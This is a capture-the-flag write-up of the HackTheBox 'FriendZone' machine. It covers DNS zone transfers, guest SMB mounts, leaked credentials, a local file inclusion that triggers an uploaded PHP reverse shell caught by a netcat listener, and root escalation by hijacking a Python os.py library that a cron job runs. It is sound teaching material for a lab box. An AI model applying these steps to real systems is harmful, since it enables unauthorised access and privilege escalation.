HTB Writeup - FriendZone

HTB Writeup - FriendZone
NoBlameNetwork July 13, 2019 0 views
FriendZone is an "Easy" difficulty Machine on hackthebox.eu


First Step: Nmap Scan of the Machine
nmap -n -v -Pn -p- -A --reason -oN fz.txt 10.10.10.123

1+ +nmap

Ubuntu, with a few things worth looking at
Primary areas of opportunity: FTP/21, HTTP/80, SMB/445
Interesting port: TCP/53
21/tcp  open  ftp         syn-ack ttl 63 vsftpd 3.0.3
22/tcp  open  ssh         syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp  open  domain      syn-ack ttl 63
80/tcp  open  http        syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
139/tcp open  netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    syn-ack ttl 63 Apache httpd 2.4.29
445/tcp open  netbios-ssn syn-ack ttl 63 Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)


I added a static entry to my /etc/hosts file

10.10.10.123  friendzone.htb

Checking to see if we can find anything with DNS since the port is apparently open, but  nslookup shows nothing
Copy+of+2019 06 11 21 20 27

 DNS zone transfer shows nothing
Copy+of+dns Stuck

Time to checkout something else.
Check the web browser first:


2019 06 11 21 23 56



 Nothing on the page worth mentioning, nothing in the source either.

Time to Check HTTPS :

 2019 06 11 21 24 55

 I accept the certificate, but the page doesn't load
Crashes2

I check the cert, and found the CN was set to friendzone.red

 Cert1Cert3







 Added a new entry into /etc/hosts
2019 06 11 21 26 33

Nslookup still didnt give me anything good, but I was able to use the DNS Zone Transfer to find multiple hostnames used by this box.
2019 06 11 21 31 39

Added 3 new entries into my /etc/hosts file
10.10.10.123  administrator1.friendzone.red
10.10.10.123  hr.friendzone.red
10.10.10.123  uploads.friendzone.red 
10.10.10.123  friendzone.red
2019 06 11 21 33 01


DNS Entry 1) https://friendzone.red, was just a gif of a dude trying desperately to escape the friendzone.
    Escape
 I was able to enumerate and find /admin
Friendzone.red Bust

but was empty. So I think this is a dead end...
Admin Empty


DNS Entry 2) https://administrator1.friendzone.red, an admin portal for something. Sweet!
2019 06 11 21 33 36

I busted an image folder, but no access without logging in first. 
Admin Bust
We'll revisit https://administrator1.friendzone.red for sure

DNS Entry 3) https://uploads.friendzone.red, an upload page! Here, I was thiking LFI for sure.
2019 06 11 21 34 07
I uploaded the image, to verify what a working version of this looks like
Upload1

So it says successful, and provides what looks like an epoch timestamp.
Upload2

No matter what I did here was I able to determine where these were ending up. So, perhaps useful, but I'll just keep it in mind for later.

 DNS Entry 4) hr.friendzone.red does nothing, definition of a dead end.
2019 06 11 21 34 18


Time to see what other information we can find. Let's check 
SMB/445
smbclient -L friendzone.htb
SMB

# Create a Directory for mapping the shares
mkdir sambas
# Access the folder
cd sambas
# Create 3 folders for their Network Mappings
mkdir Files
mkdir general
mkdir Development

#Attempt to Mount all 3 folders at the same time using the guest credentials
mount //10.10.10.123/Files ~/sambas/Files -o username=guest,password=''
mount //10.10.10.123/general ~/sambas/general -o username=guest,password=''
mount //10.10.10.123/Development ~/sambas/Development -o username=guest,password=''

I was able to map 2 of the 3 drives using the guest login!
2019 06 12 14 14 52

We can see the two that accepted the connections are Development and general. In general we're able to find a file names 'cred.txt' with some credentials in it.
2019 06 12 14 16 29Another nice thing about doing the samba shares in this manner, for me anyway, is you can use the GUI and keep notes in an open notepad. Do what you prefer though!

/general folder
GUI:
GuiView
CLI:
Cli Pass
So I think we've discovered some good information here based on the other folks using the Development folder. There is some kind of LFI at play for sure.

/Development folder
GUI:
Dev2

CLI:
Dev1


Let's try our login credentials on the administrator1.friendzone.red portal

URL:
https://administrator1.friendzone.red
2019 06 11 21 40 50

Excellent, were in, and its leading us toward a dashboard!
2019 06 11 21 40 57

The dashboard has even more instructions for us on  how to use its URL Encoding

https://administrator1.friendzone.red/dashboard.php
2019 06 11 21 41 16

So it brings up an image (that a.jpg and b.jpg work for), and pagename=timestamp.

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp
2019 06 11 21 41 55

Of course we have to check and see if timestamp is a local php file, thats exactly what it is. So this will be where we hunt down our LFI Enumeration.

https://administrator1.friendzone.red/timestamp.php
Timestamp
Now, this is where I got pissed trying to figure out where to search for the folders for. Folks were rebooting the box like mad, sticking pagename=dashboard into the url above which im sure was killing the box, which im also guilty of see below...
Dashboard Loop

So i stepped away and came back after about 2 weeks. 

This helped as when I was reviewing my screenshots from my first dive in I noticed in the smbclient screenshot had a comment labeling the "Files" share as '/etc/Files'.
SMB2
If you remember we had no access to this folder, so this may be nothing, but i moved forward with the assumption that /etc/general and /etc/Development (maybe /etc/Dev) were the folder locations for those shares.

I created a simple php file with <?php echo 'hello world'; ?> inside to test, and named it dbtn. and saved it in the /sambas/Development folder.


URL:

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/dbtn
Hello World



This script is consistently one of the best for php reverse shells
http://pentestmonkey.net/tools/web-shells/php-reverse-shell

I updated the ip and ports in the reverse script, and uploaded it to the /sambas/Development folder
2019 06 12 15 26 09

Now we set the Kali box to listen on port 9595
nc -v -n -l -p 9595
2019 06 12 15 30 12

We then go back to our browser, and kick off the remote shell
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/dbtn_shell


2019 06 12 15 31 05


We check the user folder and find the user flag
2019 06 12 15 31 47

After hunting around for a LONG time i found a database username and password
2019 06 12 15 32 56

Which thankfully let me in via SSH:
2019 06 12 15 33 37


I was grepping "ps aux" to see what I could find for services.
Ps Aux

I realize that because I spotted this I skipped a HUGE part the process here, but I did work my way back, after I got the root flag. That information will be at the bottom of this, and was a great to learn!

I found multiple os.py files which is worth noting
2019 06 10 18 59 44


I looked into the os.py file the user was and found the following command at the end of the file:
Ospy

So it seems that he's piggybacking on a python script which is running at a regular interval. Likely a cron, or maybe something triggered through the web interface.

I wasn't sure where the root flag was specifically, so I grabbed 3 locations I thought it might be (knowing full well the Desktop and Root werent even likely to exist)
Ospy2

About 5 minutes later I checked my /home folder, and the only file with anything in it was moo3.txt, which held the root flag.
Root Flag




 Ok, so back to the piece I skipped... remember i spotted this guy editing the python file directly...Ps Aux

 To the google! I found an application that lets me see all processes running, even without root. Ironically, you can see in the screenshot above someone was running .pspy, so this is likely the exact same way he figured it out too.
2019 06 12 16 48 30

GitHub for the win!
2019 06 12 12 48 21

 I cloned the repo from github
2019 06 12 12 22 24

Started up my super basic web server
systemctl start apache2
2

Copied the python script into my web folder
cp pspy64 /var/www/html/
1

 Downloaded the .py file into the friendzone.htb /home/friend/test folder
wget http://10.10.x.x/pspy64

2019 06 12 12 43 27

 Ran into some permission issues
./pspy64

2019 06 12 12 43 43

Fixed permissions, and it started checking for all running processes
chmod 777 pspy64 && ./pspy64

2019 06 12 12 44 08

 The output screamed for a few seconds before calming down, but within 2-3 minutes i saw the following
2019 06 12 12 40 24

 Checked the reporter.py file and found nothing of consequence other than the 'import os' pieces which refer back to the os.py file in the python2.7 library folder.
2019 06 12 12 42 14

 What I can't figure out how they determined they needed to edit the 2.7 file opposed to the any of the 3 python3 folders...


 Dead Ends and Rabbit Holes

  • https://friendzone.red, 
    • was just a gif of a dude trying desperately to escape the friendzone.
    • /admin went nowhere
  • FTP
    • Never got in, and spent a while trying to identify any vulnerabilities to no avail.
  • Wfuzz
    • I love wfuzz... but ince this used to much SSL I wasnt able to use it, but blew a lot of time trying to figure out a way fuzz even if it was HTTPS. 
  • https://uploads.friendzone.red
    • I assumed it was a broken script on the front end so I wasted a lot of time trying to fix the input object names. In the end the script on the backend (upload.php) literally doesn't do anything with the file. It just checks if there is one, then tells you it was successful.
  • https://administrator1.friendzone.red/dashboard.php
    • Finding the right folder to abuse LFI. In the end the answer was simple... and if I spent time looking for clues too it would have been faster.